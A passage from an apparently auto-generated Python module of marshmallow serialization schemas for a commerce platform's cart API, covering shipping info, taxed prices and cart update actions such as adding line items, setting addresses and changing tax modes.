__name__, ".order_edit.OrderEditReferenceSchema"
),
"order": helpers.absmod(__name__, ".order.OrderReferenceSchema"),
"payment": helpers.absmod(__name__, ".payment.PaymentReferenceSchema"),
"product-discount": helpers.absmod(
__name__, ".product_discount.ProductDiscountReferenceSchema"
),
"product-type": helpers.absmod(
__name__, ".product_type.ProductTypeReferenceSchema"
),
"product": helpers.absmod(__name__, ".product.ProductReferenceSchema"),
"review": helpers.absmod(__name__, ".review.ReviewReferenceSchema"),
"shipping-method": helpers.absmod(
__name__, ".shipping_method.ShippingMethodReferenceSchema"
),
"shopping-list": helpers.absmod(
__name__, ".shopping_list.ShoppingListReferenceSchema"
),
"state": helpers.absmod(__name__, ".state.StateReferenceSchema"),
"store": helpers.absmod(__name__, ".store.StoreReferenceSchema"),
"tax-category": helpers.absmod(
__name__, ".tax_category.TaxCategoryReferenceSchema"
),
"type": helpers.absmod(__name__, ".type.TypeReferenceSchema"),
"zone": helpers.absmod(__name__, ".zone.ZoneReferenceSchema"),
},
missing=None,
)
key = marshmallow.fields.String(
allow_none=True, metadata={"omit_empty": True}, missing=None
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
return models.ReplicaCartDraft(**data)
class ShippingInfoSchema(helpers.BaseSchema):
shipping_method_name = marshmallow.fields.String(
allow_none=True, missing=None, data_key="shippingMethodName"
)
price = helpers.Discriminator(
allow_none=True,
discriminator_field=("type", "type"),
discriminator_schemas={
"centPrecision": helpers.absmod(
__name__, ".common.CentPrecisionMoneySchema"
),
"highPrecision": helpers.absmod(
__name__, ".common.HighPrecisionMoneySchema"
),
},
missing=None,
)
shipping_rate = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".shipping_method.ShippingRateSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
missing=None,
data_key="shippingRate",
)
taxed_price = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".TaxedItemPriceSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="taxedPrice",
)
tax_rate = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".tax_category.TaxRateSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="taxRate",
)
tax_category = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".tax_category.TaxCategoryReferenceSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="taxCategory",
)
shipping_method = helpers.LazyNestedField(
nested=helpers.absmod(
__name__, ".shipping_method.ShippingMethodReferenceSchema"
),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="shippingMethod",
)
deliveries = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".order.DeliverySchema"),
allow_none=True,
many=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
)
discounted_price = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".DiscountedLineItemPriceSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="discountedPrice",
)
shipping_method_state = marshmallow_enum.EnumField(
ShippingMethodState,
by_value=True,
allow_none=True,
missing=None,
data_key="shippingMethodState",
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
return models.ShippingInfo(**data)
class ShippingRateInputSchema(helpers.BaseSchema):
type = marshmallow.fields.String(allow_none=True, missing=None)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
del data["type"]
return models.ShippingRateInput(**data)
class ClassificationShippingRateInputSchema(ShippingRateInputSchema):
key = marshmallow.fields.String(allow_none=True, missing=None)
label = LocalizedStringField(allow_none=True, missing=None)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
del data["type"]
return models.ClassificationShippingRateInput(**data)
class ScoreShippingRateInputSchema(ShippingRateInputSchema):
score = marshmallow.fields.Float(allow_none=True, missing=None)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
del data["type"]
return models.ScoreShippingRateInput(**data)
class ShippingRateInputDraftSchema(helpers.BaseSchema):
type = marshmallow.fields.String(allow_none=True, missing=None)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
del data["type"]
return models.ShippingRateInputDraft(**data)
class ClassificationShippingRateInputDraftSchema(ShippingRateInputDraftSchema):
key = marshmallow.fields.String(allow_none=True, missing=None)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
del data["type"]
return models.ClassificationShippingRateInputDraft(**data)
class ScoreShippingRateInputDraftSchema(ShippingRateInputDraftSchema):
score = marshmallow.fields.Float(allow_none=True, missing=None)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
del data["type"]
return models.ScoreShippingRateInputDraft(**data)
class TaxPortionSchema(helpers.BaseSchema):
name = marshmallow.fields.String(
allow_none=True, metadata={"omit_empty": True}, missing=None
)
rate = marshmallow.fields.Float(allow_none=True, missing=None)
amount = helpers.Discriminator(
allow_none=True,
discriminator_field=("type", "type"),
discriminator_schemas={
"centPrecision": helpers.absmod(
__name__, ".common.CentPrecisionMoneySchema"
),
"highPrecision": helpers.absmod(
__name__, ".common.HighPrecisionMoneySchema"
),
},
missing=None,
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
return models.TaxPortion(**data)
class TaxPortionDraftSchema(helpers.BaseSchema):
name = marshmallow.fields.String(
allow_none=True, metadata={"omit_empty": True}, missing=None
)
rate = marshmallow.fields.Float(allow_none=True, missing=None)
amount = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".common.MoneySchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
missing=None,
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
return models.TaxPortionDraft(**data)
class TaxedItemPriceSchema(helpers.BaseSchema):
total_net = helpers.Discriminator(
allow_none=True,
discriminator_field=("type", "type"),
discriminator_schemas={
"centPrecision": helpers.absmod(
__name__, ".common.CentPrecisionMoneySchema"
),
"highPrecision": helpers.absmod(
__name__, ".common.HighPrecisionMoneySchema"
),
},
missing=None,
data_key="totalNet",
)
total_gross = helpers.Discriminator(
allow_none=True,
discriminator_field=("type", "type"),
discriminator_schemas={
"centPrecision": helpers.absmod(
__name__, ".common.CentPrecisionMoneySchema"
),
"highPrecision": helpers.absmod(
__name__, ".common.HighPrecisionMoneySchema"
),
},
missing=None,
data_key="totalGross",
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
return models.TaxedItemPrice(**data)
class TaxedPriceSchema(helpers.BaseSchema):
total_net = helpers.Discriminator(
allow_none=True,
discriminator_field=("type", "type"),
discriminator_schemas={
"centPrecision": helpers.absmod(
__name__, ".common.CentPrecisionMoneySchema"
),
"highPrecision": helpers.absmod(
__name__, ".common.HighPrecisionMoneySchema"
),
},
missing=None,
data_key="totalNet",
)
total_gross = helpers.Discriminator(
allow_none=True,
discriminator_field=("type", "type"),
discriminator_schemas={
"centPrecision": helpers.absmod(
__name__, ".common.CentPrecisionMoneySchema"
),
"highPrecision": helpers.absmod(
__name__, ".common.HighPrecisionMoneySchema"
),
},
missing=None,
data_key="totalGross",
)
tax_portions = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".TaxPortionSchema"),
allow_none=True,
many=True,
unknown=marshmallow.EXCLUDE,
missing=None,
data_key="taxPortions",
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
return models.TaxedPrice(**data)
class TaxedPriceDraftSchema(helpers.BaseSchema):
total_net = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".common.MoneySchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
missing=None,
data_key="totalNet",
)
total_gross = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".common.MoneySchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
missing=None,
data_key="totalGross",
)
tax_portions = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".TaxPortionDraftSchema"),
allow_none=True,
many=True,
unknown=marshmallow.EXCLUDE,
missing=None,
data_key="taxPortions",
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
return models.TaxedPriceDraft(**data)
class CartAddCustomLineItemActionSchema(CartUpdateActionSchema):
money = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".common.MoneySchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
missing=None,
)
name = LocalizedStringField(allow_none=True, missing=None)
quantity = marshmallow.fields.Integer(allow_none=True, missing=None)
slug = marshmallow.fields.String(allow_none=True, missing=None)
tax_category = helpers.LazyNestedField(
nested=helpers.absmod(
__name__, ".tax_category.TaxCategoryResourceIdentifierSchema"
),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="taxCategory",
)
custom = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".type.CustomFieldsDraftSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
)
external_tax_rate = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".ExternalTaxRateDraftSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="externalTaxRate",
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
del data["action"]
return models.CartAddCustomLineItemAction(**data)
class CartAddDiscountCodeActionSchema(CartUpdateActionSchema):
code = marshmallow.fields.String(allow_none=True, missing=None)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
del data["action"]
return models.CartAddDiscountCodeAction(**data)
class CartAddItemShippingAddressActionSchema(CartUpdateActionSchema):
address = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".common.AddressSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
missing=None,
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
del data["action"]
return models.CartAddItemShippingAddressAction(**data)
class CartAddLineItemActionSchema(CartUpdateActionSchema):
custom = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".type.CustomFieldsDraftSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
)
distribution_channel = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".channel.ChannelResourceIdentifierSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="distributionChannel",
)
external_tax_rate = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".ExternalTaxRateDraftSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="externalTaxRate",
)
product_id = marshmallow.fields.String(
allow_none=True,
metadata={"omit_empty": True},
missing=None,
data_key="productId",
)
variant_id = marshmallow.fields.Integer(
allow_none=True,
metadata={"omit_empty": True},
missing=None,
data_key="variantId",
)
sku = marshmallow.fields.String(
allow_none=True, metadata={"omit_empty": True}, missing=None
)
quantity = marshmallow.fields.Integer(
allow_none=True, metadata={"omit_empty": True}, missing=None
)
supply_channel = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".channel.ChannelResourceIdentifierSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="supplyChannel",
)
external_price = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".common.MoneySchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="externalPrice",
)
external_total_price = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".ExternalLineItemTotalPriceSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="externalTotalPrice",
)
shipping_details = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".ItemShippingDetailsDraftSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="shippingDetails",
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
del data["action"]
return models.CartAddLineItemAction(**data)
class CartAddPaymentActionSchema(CartUpdateActionSchema):
payment = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".payment.PaymentResourceIdentifierSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
missing=None,
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
del data["action"]
return models.CartAddPaymentAction(**data)
class CartAddShoppingListActionSchema(CartUpdateActionSchema):
shopping_list = helpers.LazyNestedField(
nested=helpers.absmod(
__name__, ".shopping_list.ShoppingListResourceIdentifierSchema"
),
allow_none=True,
unknown=marshmallow.EXCLUDE,
missing=None,
data_key="shoppingList",
)
supply_channel = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".channel.ChannelResourceIdentifierSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="supplyChannel",
)
distribution_channel = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".channel.ChannelResourceIdentifierSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="distributionChannel",
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
del data["action"]
return models.CartAddShoppingListAction(**data)
class CartApplyDeltaToCustomLineItemShippingDetailsTargetsActionSchema(
CartUpdateActionSchema
):
custom_line_item_id = marshmallow.fields.String(
allow_none=True, missing=None, data_key="customLineItemId"
)
targets_delta = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".ItemShippingTargetSchema"),
allow_none=True,
many=True,
unknown=marshmallow.EXCLUDE,
missing=None,
data_key="targetsDelta",
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
del data["action"]
return models.CartApplyDeltaToCustomLineItemShippingDetailsTargetsAction(**data)
class CartApplyDeltaToLineItemShippingDetailsTargetsActionSchema(
CartUpdateActionSchema
):
line_item_id = marshmallow.fields.String(
allow_none=True, missing=None, data_key="lineItemId"
)
targets_delta = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".ItemShippingTargetSchema"),
allow_none=True,
many=True,
unknown=marshmallow.EXCLUDE,
missing=None,
data_key="targetsDelta",
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
del data["action"]
return models.CartApplyDeltaToLineItemShippingDetailsTargetsAction(**data)
class CartChangeCustomLineItemMoneyActionSchema(CartUpdateActionSchema):
custom_line_item_id = marshmallow.fields.String(
allow_none=True, missing=None, data_key="customLineItemId"
)
money = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".common.MoneySchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
missing=None,
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
del data["action"]
return models.CartChangeCustomLineItemMoneyAction(**data)
class CartChangeCustomLineItemQuantityActionSchema(CartUpdateActionSchema):
custom_line_item_id = marshmallow.fields.String(
allow_none=True, missing=None, data_key="customLineItemId"
)
quantity = marshmallow.fields.Integer(allow_none=True, missing=None)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
del data["action"]
return models.CartChangeCustomLineItemQuantityAction(**data)
class CartChangeLineItemQuantityActionSchema(CartUpdateActionSchema):
line_item_id = marshmallow.fields.String(
allow_none=True, missing=None, data_key="lineItemId"
)
quantity = marshmallow.fields.Integer(allow_none=True, missing=None)
external_price = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".common.MoneySchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="externalPrice",
)
external_total_price = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".ExternalLineItemTotalPriceSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="externalTotalPrice",
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
del data["action"]
return models.CartChangeLineItemQuantityAction(**data)
class CartChangeTaxCalculationModeActionSchema(CartUpdateActionSchema):
tax_calculation_mode = marshmallow_enum.EnumField(
TaxCalculationMode,
by_value=True,
allow_none=True,
missing=None,
data_key="taxCalculationMode",
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
del data["action"]
return models.CartChangeTaxCalculationModeAction(**data)
class CartChangeTaxModeActionSchema(CartUpdateActionSchema):
tax_mode = marshmallow_enum.EnumField(
TaxMode, by_value=True, allow_none=True, missing=None, data_key="taxMode"
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
del data["action"]
return models.CartChangeTaxModeAction(**data)
class CartChangeTaxRoundingModeActionSchema(CartUpdateActionSchema):
tax_rounding_mode = marshmallow_enum.EnumField(
RoundingMode,
by_value=True,
allow_none=True,
missing=None,
data_key="taxRoundingMode",
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
del data["action"]
return models.CartChangeTaxRoundingModeAction(**data)
class CartRecalculateActionSchema(CartUpdateActionSchema):
update_product_data = marshmallow.fields.Boolean(
allow_none=True,
metadata={"omit_empty": True},
missing=None,
data_key="updateProductData",
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
del data["action"]
return models.CartRecalculateAction(**data)
class CartRemoveCustomLineItemActionSchema(CartUpdateActionSchema):
custom_line_item_id = marshmallow.fields.String(
allow_none=True, missing=None, data_key="customLineItemId"
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
del data["action"]
return models.CartRemoveCustomLineItemAction(**data)
class CartRemoveDiscountCodeActionSchema(CartUpdateActionSchema):
discount_code = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".discount_code.DiscountCodeReferenceSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
missing=None,
data_key="discountCode",
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
del data["action"]
return models.CartRemoveDiscountCodeAction(**data)
class CartRemoveItemShippingAddressActionSchema(CartUpdateActionSchema):
address_key = marshmallow.fields.String(
allow_none=True, missing=None, data_key="addressKey"
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
del data["action"]
return models.CartRemoveItemShippingAddressAction(**data)
class CartRemoveLineItemActionSchema(CartUpdateActionSchema):
line_item_id = marshmallow.fields.String(
allow_none=True, missing=None, data_key="lineItemId"
)
quantity = marshmallow.fields.Integer(
allow_none=True, metadata={"omit_empty": True}, missing=None
)
external_price = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".common.MoneySchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="externalPrice",
)
external_total_price = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".ExternalLineItemTotalPriceSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="externalTotalPrice",
)
shipping_details_to_remove = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".ItemShippingDetailsDraftSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="shippingDetailsToRemove",
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
del data["action"]
return models.CartRemoveLineItemAction(**data)
class CartRemovePaymentActionSchema(CartUpdateActionSchema):
payment = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".payment.PaymentResourceIdentifierSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
missing=None,
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
del data["action"]
return models.CartRemovePaymentAction(**data)
class CartSetAnonymousIdActionSchema(CartUpdateActionSchema):
anonymous_id = marshmallow.fields.String(
allow_none=True,
metadata={"omit_empty": True},
missing=None,
data_key="anonymousId",
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
del data["action"]
return models.CartSetAnonymousIdAction(**data)
class CartSetBillingAddressActionSchema(CartUpdateActionSchema):
address = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".common.AddressSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
del data["action"]
return models.CartSetBillingAddressAction(**data)
class CartSetCartTotalTaxActionSchema(CartUpdateActionSchema):
external_total_gross = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".common.MoneySchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
missing=None,
data_key="externalTotalGross",
)
external_tax_portions = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".TaxPortionDraftSchema"),
allow_none=True,
many=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="externalTaxPortions",
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
del data["action"]
return models.CartSetCartTotalTaxAction(**data)
class CartSetCountryActionSchema(CartUpdateActionSchema):
country = marshmallow.fields.String(
allow_none=True, metadata={"omit_empty": True}, missing=None
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
del data["action"]
return models.CartSetCountryAction(**data)
class CartSetCustomFieldActionSchema(CartUpdateActionSchema):
name = marshmallow.fields.String(allow_none=True, missing=None)
value = marshmallow.fields.Raw(
allow_none=True, metadata={"omit_empty": True}, missing=None
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
del data["action"]
return models.CartSetCustomFieldAction(**data)
class CartSetCustomLineItemCustomFieldActionSchema(CartUpdateActionSchema):
custom_line_item_id = marshmallow.fields.String(
allow_none=True, missing=None, data_key="customLineItemId"
)
name = marshmallow.fields.String(allow_none=True, missing=None)
value = marshmallow.fields.Raw(
allow_none=True, metadata={"omit_empty": True}, missing=None
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
del data["action"]
return models.CartSetCustomLineItemCustomFieldAction(**data)
class CartSetCustomLineItemCustomTypeActionSchema(CartUpdateActionSchema):
custom_line_item_id = marshmallow.fields.String(
allow_none=True, missing=None, data_key="customLineItemId"
)
type = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".type.TypeResourceIdentifierSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
)
fields = FieldContainerField(
allow_none=True, metadata={"omit_empty": True}, missing=None
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
del data["action"]
return models.CartSetCustomLineItemCustomTypeAction(**data)
class CartSetCustomLineItemShippingDetailsActionSchema(CartUpdateActionSchema):
custom_line_item_id = marshmallow.fields.String(
allow_none=True, missing=None, data_key="customLineItemId"
)
shipping_details = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".ItemShippingDetailsDraftSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="shippingDetails",
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
del data["action"]
return models.CartSetCustomLineItemShippingDetailsAction(**data)
class CartSetCustomLineItemTaxAmountActionSchema(CartUpdateActionSchema):
custom_line_item_id = marshmallow.fields.String(
allow_none=True, missing=None, data_key="customLineItemId"
)
external_tax_amount = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".ExternalTaxAmountDraftSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="externalTaxAmount",
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
del data["action"]
return models.CartSetCustomLineItemTaxAmountAction(**data)
class CartSetCustomLineItemTaxRateActionSchema(CartUpdateActionSchema):
custom_line_item_id = marshmallow.fields.String(
allow_none=True, missing=None, data_key="customLineItemId"
)
external_tax_rate = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".ExternalTaxRateDraftSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="externalTaxRate",
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
del data["action"]
return models.CartSetCustomLineItemTaxRateAction(**data)
class CartSetCustomShippingMethodActionSchema(CartUpdateActionSchema):
shipping_method_name = marshmallow.fields.String(
allow_none=True, missing=None, data_key="shippingMethodName"
)
shipping_rate = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".shipping_method.ShippingRateDraftSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
missing=None,
data_key="shippingRate",
)
tax_category = helpers.LazyNestedField(
nested=helpers.absmod(
__name__, ".tax_category.TaxCategoryResourceIdentifierSchema"
),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="taxCategory",
)
external_tax_rate = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".ExternalTaxRateDraftSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="externalTaxRate",
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
del data["action"]
return models.CartSetCustomShippingMethodAction(**data)
class CartSetCustomTypeActionSchema(CartUpdateActionSchema):
type = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".type.TypeResourceIdentifierSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
)
fields = FieldContainerField(
allow_none=True, metadata={"omit_empty": True}, missing=None
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
del data["action"]
return models.CartSetCustomTypeAction(**data)
class CartSetCustomerEmailActionSchema(CartUpdateActionSchema):
email = marshmallow.fields.String(allow_none=True, missing=None)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
del data["action"]
return models.CartSetCustomerEmailAction(**data)
class CartSetCustomerGroupActionSchema(CartUpdateActionSchema):
customer_group = helpers.LazyNestedField(
nested=helpers.absmod(
__name__, ".customer_group.CustomerGroupResourceIdentifierSchema"
),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="customerGroup",
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
del data["action"]
return models.CartSetCustomerGroupAction(**data)
class CartSetCustomerIdActionSchema(CartUpdateActionSchema):
customer_id = marshmallow.fields.String(
allow_none=True,
metadata={"omit_empty": True},
missing=None,
data_key="customerId",
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
del data["action"]
return models.CartSetCustomerIdAction(**data)
class CartSetDeleteDaysAfterLastModificationActionSchema(CartUpdateActionSchema):
delete_days_after_last_modification = marshmallow.fields.Integer(
allow_none=True,
metadata={"omit_empty": True},
missing=None,
data_key="deleteDaysAfterLastModification",
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
del data["action"]
return models.CartSetDeleteDaysAfterLastModificationAction(**data)
class CartSetKeyActionSchema(CartUpdateActionSchema):
key = marshmallow.fields.String(
allow_none=True, metadata={"omit_empty": True}, missing=None
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
del data["action"]
return models.CartSetKeyAction(**data)
class CartSetLineItemCustomFieldActionSchema(CartUpdateActionSchema):
line_item_id = marshmallow.fields.String(
allow_none=True, missing=None, data_key="lineItemId"
)
name = marshmallow.fields.String(allow_none=True, missing=None)
value = marshmallow.fields.Raw(
allow_none=True, metadata={"omit_empty": True}, missing=None
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
del data["action"]
return models.CartSetLineItemCustomFieldAction(**data)
class CartSetLineItemCustomTypeActionSchema(CartUpdateActionSchema):
line_item_id = marshmallow.fields.String(
allow_none=True, missing=None, data_key="lineItemId"
)
type = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".type.TypeResourceIdentifierSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
)
fields = FieldContainerField(
allow_none=True, metadata={"omit_empty": True}, missing=None
)
class Meta:
